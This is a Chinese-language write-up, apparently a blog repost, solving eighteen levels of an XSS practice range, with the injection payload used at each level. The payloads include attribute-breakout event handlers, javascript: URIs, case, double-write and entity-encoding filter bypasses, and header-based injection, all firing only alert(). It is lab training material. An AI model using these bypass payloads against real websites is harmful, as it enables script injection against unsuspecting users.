xss hack学习靶场 writeup

靶场链接http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg
参考博客https://blog.csdn.net/xlsj228/article/details/93166486

1

可以看到url中的test参数出现在页面中,虽然f12看到了下一关的地址,我假装没看见

1503988-20190812093911279-1746962902.png

在url处构造payload:xss.tesla-space.com/level1.php?name=test</h2><script>alert("xx")<\script>

2

1503988-20190812093943849-1692120256.png

构造:" onmouseover=alert()

3

依旧如上一关
1503988-20190812094757504-528275017.png

输入" onmouseover=alert() 发现引号不能闭合
1503988-20190812094810672-14997305.png

输入' onmouseover=alert()单引号可以闭合
1503988-20190812094818882-640674657.png

4

同2
1503988-20190812094838274-2082356499.png

5

" onmouseover=alert() 发现on中间加了下划线
1503988-20190812095000497-1178709411.png

" /> <script>alert()</script> script中间加了下划线
1503988-20190812095008322-900533972.png

尝试大小写等无法绕过

就想到利用javascript伪协议 " /><a href=javascript:alert("ccc");>xxx</a>
1503988-20190812095018878-755987771.png

6

和5相同,采用5的解法,发现href也被加了下划线,用大小写绕过,成功

" /><a Href=javascript:alert("ccc");>xxx</a>
1503988-20190812095033488-1450268620.png

7

onmouseover 的on被过滤,采用双写绕过

" oonnmouseover=alert()

8

采用javascript伪协议,可是被过滤

1503988-20190812095104233-1348140136.png

采用空格绕过,javascr ipt:alert('xss') ;还是不行

1503988-20190812095113327-1920794397.png

采用16进制编码,仍然不行

采用unicode编码,将t进行编码,成功

javascrip&#116:alert('xss') ;

9

利用javascrip&#116:alert(),发现
1503988-20190812095126317-1916578958.png

最后试探发现必须包含一个正常的链接,所以包含一个被注释掉的链接

javascrip&#116:alert()//http://www.baidu.com

1503988-20190812095138922-1257189272.png

10

查看源码发现是3个隐藏的标签

1503988-20190812095148334-1798254934.png

传入相关值,并将type设置为text可见http://xss.tesla-space.com/level10.php?t_sort="onmouseover="alert()"type="text

前两个标签不起作用,利用最后一个标签

1503988-20190812095158187-371489258.png

11

参考https://blog.csdn.net/xlsj228/article/details/93166486

用bp截断增加referer头

referer:'' onmouseover=alert() type="text

1503988-20190812095207363-1078704785.png

12

与上相同,在user-agent处

1503988-20190812095216923-1662545310.png

13

与上相同,在cookie处

14

这一关好像挂了

1503988-20190812095226395-2071946527.png

然后下面给的level15的链接也挂了

手动改url进15关http://xss.tesla-space.com/level15.php

15

结果15关加载半天卡死……

16

将空格,script等过滤

运用<svg onload=alert()>标签

空格用回车换行%0d,%0a代替

17

url为http://xss.tesla-space.com/level17.php?arg01=a&arg02=b

1503988-20190812095237833-347263577.png

构造payload:http://xss.tesla-space.com/level17.php?arg01=a&arg02=b" onmouseover=alert()

18

与17相同

转载于:https://www.cnblogs.com/Qi-Lin/p/11338042.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值